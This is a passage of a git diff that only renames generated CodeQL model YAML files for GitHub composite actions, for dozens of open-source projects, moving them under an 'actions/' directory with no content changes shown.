similarity index 100% rename from ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml rename to actions/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/actions/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml rename to actions/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/actions/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml rename to actions/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/actions/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml rename to actions/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/actions/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/discourse_.github.model.yml rename to actions/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/actions/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml rename to actions/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/actions/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml rename to actions/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/actions/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml rename to actions/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/actions/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml rename to actions/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/actions/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml rename to actions/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml diff --git a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/actions/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml rename to actions/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/actions/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml rename to actions/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/actions/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml rename to actions/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/actions/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml rename to actions/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/actions/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml rename to actions/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/actions/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml rename to actions/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/actions/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/emberjs_data.model.yml rename to actions/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/actions/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml rename to actions/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/actions/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml rename to actions/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/actions/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/erlang_otp.model.yml rename to actions/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/actions/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml rename to actions/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/actions/ql/lib/ext/generated/composite-actions/expensify_app.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/expensify_app.model.yml rename to actions/ql/lib/ext/generated/composite-actions/expensify_app.model.yml diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/actions/ql/lib/ext/generated/composite-actions/expo_expo.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/expo_expo.model.yml rename to actions/ql/lib/ext/generated/composite-actions/expo_expo.model.yml diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/actions/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml rename to actions/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/actions/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml rename to actions/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/actions/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml rename to actions/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/actions/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/facebook_flow.model.yml rename to actions/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/actions/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml rename to actions/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/actions/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml rename to actions/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml rename to actions/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/actions/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml rename to actions/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml rename to actions/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml diff --git a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/actions/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml rename to actions/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/actions/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml rename to actions/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/actions/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml rename to actions/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/actions/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml rename to actions/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/actions/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml rename to actions/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/actions/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml rename to actions/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/actions/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml rename to actions/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/actions/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml rename to actions/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/actions/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml rename to actions/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/actions/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml rename to actions/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/actions/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml rename to actions/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/actions/ql/lib/ext/generated/composite-actions/github_ruby.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/github_ruby.model.yml rename to actions/ql/lib/ext/generated/composite-actions/github_ruby.model.yml diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/actions/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml rename to actions/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/actions/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml rename to actions/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/actions/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml rename to actions/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/actions/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml rename to actions/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/actions/ql/lib/ext/generated/composite-actions/google_dagger.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/google_dagger.model.yml rename to actions/ql/lib/ext/generated/composite-actions/google_dagger.model.yml diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/actions/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml rename to actions/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/actions/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml rename to actions/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/actions/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml rename to actions/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/actions/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml rename to actions/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/actions/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml rename to actions/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/actions/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/grote_transportr.model.yml rename to actions/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/actions/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml rename to actions/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/actions/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml rename to actions/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/actions/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml rename to actions/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/actions/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml rename to actions/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml rename to actions/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/actions/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml rename to actions/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/actions/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml rename to actions/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/actions/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml rename to actions/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/infracost_actions.model.yml rename to actions/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/actions/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml rename to actions/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/actions/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml rename to actions/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/actions/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml rename to actions/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/actions/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml rename to actions/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/actions/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml rename to actions/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/actions/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml rename to actions/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/actions/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml rename to actions/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/actions/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml rename to actions/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/actions/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml rename to actions/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/actions/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml rename to actions/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/actions/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml rename to actions/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/actions/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml rename to actions/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/actions/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml rename to actions/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml rename to actions/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml rename to actions/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml rename to actions/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml rename to actions/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml rename to actions/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml rename to actions/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/actions/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml rename to actions/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/actions/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml rename to actions/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml rename to actions/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/actions/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml rename to actions/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/actions/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml rename to actions/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/actions/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml rename to actions/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/actions/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml rename to actions/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/actions/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml rename to actions/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/actions/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml rename to actions/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/actions/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml rename to actions/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/actions/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml rename to actions/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/actions/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml rename to 